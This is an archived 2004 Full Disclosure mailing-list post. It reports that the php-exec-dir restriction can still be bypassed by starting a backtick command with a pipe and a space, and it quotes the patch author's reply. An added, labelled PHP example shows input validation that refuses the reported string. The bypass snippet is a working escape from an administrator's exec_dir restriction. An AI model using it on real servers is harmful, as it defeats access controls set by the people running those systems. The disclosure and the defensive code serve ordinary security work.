
Full Disclosure mailing list archives

php-exec-dir vulnerable after latest upgrade
From: "VeNoMouS" <venom () gen-x co nz>
Date: Thu, 8 Jul 2004 13:05:24 +1200


$blah = `| /bin/ps aux`;
echo nl2br($blah);

^^ do a |<space>ps exploits it again

I have my exec_dir in php.ini set to /usr/local/lib/php/bin/ with nothing inside it and I was still able to execute it; you HAVE to do the space after the pipe '|'.

----- Original Message ----- From: "C. McCohy" <mccohy () kyberdigi cz>
To: "VeNoMouS" <venom () gen-x co nz>
Sent: Wednesday, July 07, 2004 9:43 PM
Subject: Re: php-exec-dir vulnerable?

Ok, I fixed all patches to all previous and current versions of the patch;
description can be found on the project homepage.

Please inform all internet groups you have informed about the bug before.

Baj ... C. McCohy

While you are reading this text, an essential hacking tool
is being silently installed on your computer.

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
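
Added example, not part of the original post and not code from the php-exec-dir patch: one way to validate a command string against an exec_dir so that the reported `| /bin/ps aux` input is refused before any path check runs. The function name `exec_dir_resolve`, the character allowlist, the basename lookup and the sample file `report` are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not code from the php-exec-dir patch.
// Assumption: a command is acceptable only if its program, taken by basename,
// is an executable file directly inside the configured exec_dir.

function exec_dir_resolve(string $command, string $execDir): ?string
{
    // Character allowlist. Anything the shell treats specially (|, ;, &,
    // backticks, $, quotes, redirects, newlines) invalidates the whole
    // command wherever it appears, so a leading "| " never reaches the
    // path check below.
    if (!preg_match('/\A[A-Za-z0-9_.\/=:,@%+ -]+\z/', $command)) {
        return null;
    }

    // The first space-delimited token is the program name.
    $tokens = preg_split('/ +/', $command, -1, PREG_SPLIT_NO_EMPTY);
    if (!$tokens) {
        return null;
    }

    $base = realpath($execDir);
    if ($base === false) {
        return null;
    }

    // Only the basename is looked up, so "/bin/ps" and "../ps" both map to
    // "<exec_dir>/ps" and cannot name a file elsewhere.
    $binary = $base . DIRECTORY_SEPARATOR . basename($tokens[0]);
    if (!is_file($binary) || !is_executable($binary)) {
        return null;
    }
    return $binary;
}

// Constructed sample: an empty exec_dir, as in the report, then one tool added.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'exec_dir_demo_' . getmypid();
mkdir($dir, 0700);

var_dump(exec_dir_resolve('| /bin/ps aux', $dir)); // refused: pipe is outside the allowlist
var_dump(exec_dir_resolve('/bin/ps aux', $dir));   // refused: exec_dir holds no "ps"

file_put_contents($dir . '/report', "#!/bin/sh\necho ok\n");
chmod($dir . '/report', 0700);
var_dump(exec_dir_resolve('report --daily', $dir)); // accepted: resolves inside exec_dir

unlink($dir . '/report');
rmdir($dir);
```

The returned path is meant to be run without a shell, for example by passing the program and its arguments as an array to proc_open() on PHP 7.4 or later.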
